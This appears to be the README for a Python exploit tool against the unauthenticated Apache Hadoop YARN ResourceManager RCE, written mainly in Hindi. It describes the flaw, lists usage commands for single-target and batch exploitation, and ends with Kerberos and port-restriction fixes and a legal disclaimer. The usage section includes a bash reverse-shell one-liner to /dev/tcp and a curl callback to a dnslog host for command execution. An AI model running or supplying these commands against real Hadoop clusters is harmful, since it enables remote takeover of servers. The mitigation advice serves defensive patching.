
Hadoop Yan ResourceManager unauthorized RCE
Hadoop yarn ResourceManager में एक अनधिकृत पहुँच भेद्यता थी। यह भेद्यता Hadoop के मुख्य घटक Hadoop yarn में मौजूद थी। चूँकि Hadoop yarn ने RPC सेवा को डिफ़ॉल्ट रूप से सार्वजनिक कर दिया था, एक दूरस्थ हमलावर इस अनधिकृत भेद्यता का लाभ उठाकर RPC सेवा के माध्यम से मनमाने कमांड निष्पादित कर सकता था, जिससे लक्षित सर्वर को नियंत्रित किया जा सकता था। इस भेद्यता की उच्च-जोखिम स्थिति और अत्यधिक हानि को देखते हुए, तथा इसके विवरण सार्वजनिक हो चुके हैं और हमलावरों द्वारा इसका शोषण किया जा चुका है, यह अनुशंसा की जाती है कि Apache Hadoop का उपयोग करने वाले सभी उपयोगकर्ता स्व-परीक्षण करें और समय पर सुरक्षा उपाय करें।
Apache Hadoop Yarn *
python3 Hadoop_Yan_RPC_RCE.py

python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "curl xxx.dnslog.cn"


python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

https://nosec.org/home/detail/4905.html
https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth
1.अनधिकृत पहुँच को रोकने के लिए Kerberos प्रमाणीकरण सक्षम करें।
<property>
<name>hadoop.security.authentication</name>
<value>kerberos</value>
<final>false</final>
<source>core-site.xml</source>
</property>...
<property>
<name>hadoop.rpc.protection</name>
<value>authentication</value>
<final>false</final>
<source>core-default.xml</source>
</property>
2.बाहरी पतों को Hadoop RPC सेवा से संबंधित पोर्ट तक पहुँचने से प्रतिबंधित करें या इसे केवल विश्वसनीय पतों के लिए खोलने के लिए कॉन्फ़िगर करें।
गंभीर घोषणा: इस टूल का उपयोग अवैध कार्यों के लिए न करें। यह टूल केवल पार्टी A के कर्मियों और पार्टी B के कर्मियों द्वारा सुरक्षा स्व-जाँच के लिए है। यदि उपयोगकर्ता इसका अवैध उपयोग करता है, तो कानूनी जिम्मेदारी उपयोगकर्ता की होगी!!!